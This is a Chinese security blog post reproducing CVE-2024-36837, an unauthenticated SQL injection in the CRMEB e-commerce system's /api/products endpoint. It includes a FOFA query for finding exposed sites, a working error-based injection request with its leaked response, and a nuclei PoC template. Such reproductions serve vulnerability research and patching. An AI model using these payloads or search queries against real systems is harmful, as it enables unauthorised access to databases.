CVE-2024-36837漏洞复现

admin
admin
admin
139622
文章
114
评论
2024年6月20日12:34:31评论81 views字数 4545阅读15分9秒阅读模式

使

01

漏洞名称

CRMEB 电商系统 /api/products SQL注入漏洞

02

漏洞影响

CRMEB 电商系统  5.2.2以下版本

CRMEB 为开源项目,地址如下:

https://github.com/crmeb/CRMEB

03

漏洞描述

CRMEB开源商城系统是一款全开源可商用的系统,前后端分离开发,全部100%开源,在小程序、公众号、H5、APP、PC端都能用,使用方便,二开方便!安装使用也很简单!

该系统/api/products接口处存在SQL注入漏洞,未授权攻击者可以利用漏洞获取敏感数据,请及时修复。

04

FOFA搜索语句
body="/wap/first/zsff/iconfont/iconfont.css" || body="CRMEB"

CVE-2024-36837漏洞复现

05

漏洞复现

向靶场发送如下数据包

计算md5(9753165)的值

CVE-2024-36837漏洞复现

GET /api/products?limit=20&priceOrder&salesOrder&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5(9753165)))),0x7e),3550) HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15Connection: closeAccept: */*Accept-Language: enAccept-Encoding: gzip

响应内容如下,其中包含了字符串
9D414380D9F6067A05CCD40D5311B04A

HTTP/1.1 200 OKConnection: closeTransfer-Encoding: chunkedAccess-Control-Allow-Credentials: trueAccess-Control-Allow-Headers: Authori-zation,Authorization, Content-Type, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, X-Requested-With, Form-type, Cb-lang, Invalid-zationAccess-Control-Allow-Methods: GET,POST,PATCH,PUT,DELETE,OPTIONS,DELETEAccess-Control-Allow-Origin: *Access-Control-Max-Age: 1728000Content-Type: application/json; charset=utf-8Date: Thu, 20 Jun 2024 01:34:53 GMTServer: nginxSet-Cookie: cb_lang=zh-cn; path=/Set-Cookie: PHPSESSID=2fe2fe4f826c7d432b233fd4fcb29a5c; path=/{"status":400,"msg":"SQLSTATE[HY000]: General error: 1772 Malformed GTID set specification '~9d414380d9f6067a05ccd40d5311b04a~'.","data":{"message":"SQLSTATE[HY000]: General error: 1772 Malformed GTID set specification '~9d414380d9f6067a05ccd40d5311b04a~'.","file":"/www/wwwroot/czcsyy.com/crmeb/vendor/topthink/think-orm/src/db\/PDOConnection.php","line":771,"trace":[{"file":"/www/wwwroot/czcsyy.com/crmeb/vendor/topthink/think-orm/src/db/PDOConnection.php","line":688,"function":"getPDDOStatement","class":"think\db\PDOConnection","type":"->"},{"file":"/www/wwwroot/czcsyy.com/crmeb/vendor/topthink/think-orm/src/db/PDOConnection.php","line":8889,"function":"pdoQuery","class":"think\db\PDOConnection","type":"->"},{"file":"/www/wwwroot/czcsyy.com/crmeb/vendor/topthink/think-orm/src/db/BaseQuery.php"","line":1090,"function":"select","class":"think\db\PDOConnection","type":"->"},{"file":"/www/wwwroot/czcsyy.com/crmeb/app/dao/product/product/StoreProductDao..php","line":127,"function":"select","class":"think\db\BaseQuery","type":"->"},{"file":"/www/wwwroot/czcsyy.com/crmeb/vendor/topthink/think-orm/src/db/Builderr.php","line":788,"function":"app\dao\product\product\{closure}","class":"app\dao\product\product\StoreProductDao","type":"->"},{"file":"/www/wwwroot/czcsyy.coom/crmeb/vendor/topthink/think-orm/src/db/Builder.php","line":754,"function":"parseClosure","class":"think\db\Builder","type":"->"},{"file":"/www/wwwroot/czcssyy.com/crmeb/vendor/topthink/think-orm/src/db/Builder.php","line":529,"function":"parseIn","class":"think\db\Builder","type":"->"},{"file":"/www/wwwroot/czcssyy.com/crmeb/vendor/topthink/think-orm/src/db/Builder.php","line":386,"function":"parseWhereItem","class":"think\db\Builder","type":"->"},{"file":"/www/wwwrooot/czcsyy.com/crmeb/vendor/topthink/think-orm/src/db/Builder.php","line":331,"function":"parseWhereLogic","class":"think\db\Builder","type":"->"},{"file":"/wwww/wwwroot/czcsyy.com/crmeb/vendor/topthink/think-orm/src/db/Builder.php","line":299,"function":"buildWhere","class":"think\db\Builder","type":"->"},{"file":"//www/wwwroot/

CVE-2024-36837漏洞复现

漏洞复现成功

06

nuclei poc

poc文件内容如下

id: CVE-2024-36837info:  name: CRMEB v.5.2.2 - SQL Injection  author: DhiyaneshDk  severity: high  description: |    SQL Injection vulnerability in CRMEB v.5.2.2 allows a remote attacker to obtain sensitive information via the getProductList function in the ProductController.php file.  reference:    - https://github.com/phtcloud-dev/CVE-2024-36837    - https://nvd.nist.gov/vuln/detail/CVE-2024-36837  metadata:    verified: true    max-request: 1    fofa-query: title="CRMEB"  tags: cve,cve2024,crmeb,sqlivariables:  num: "{{rand_int(9000000, 9999999)}}"http:  - method: GET    path:      - "{{BaseURL}}/api/products?limit=20&priceOrder=&salesOrder=&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5({{num}})))),0x7e),3550)"    matchers-condition: and    matchers:      - type: word        part: body        words:          - "{{md5(num)}}"          - "SQLSTATE"        condition: and      - type: word        part: content_type        words:          - "application/json"      - type: status        status:          - 200# digest: 490a0046304402203044d17d81b224dafab0f052edc09852ae126401a2350dcbed817e3a8d32b6840220266a399dff53e7dd81a0eeea14d4f29ab5039fee825cd84700698d76b30c8e7f:922c64590222798bb761d5b6d8e72950

CVE-2024-36837漏洞复现

07

修复建议

升级到最新版本。

原文始发于微信公众号(AI与网安):CVE-2024-36837漏洞复现

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年6月20日12:34:31
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-36837漏洞复现https://cn-sec.com/archives/2865673.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息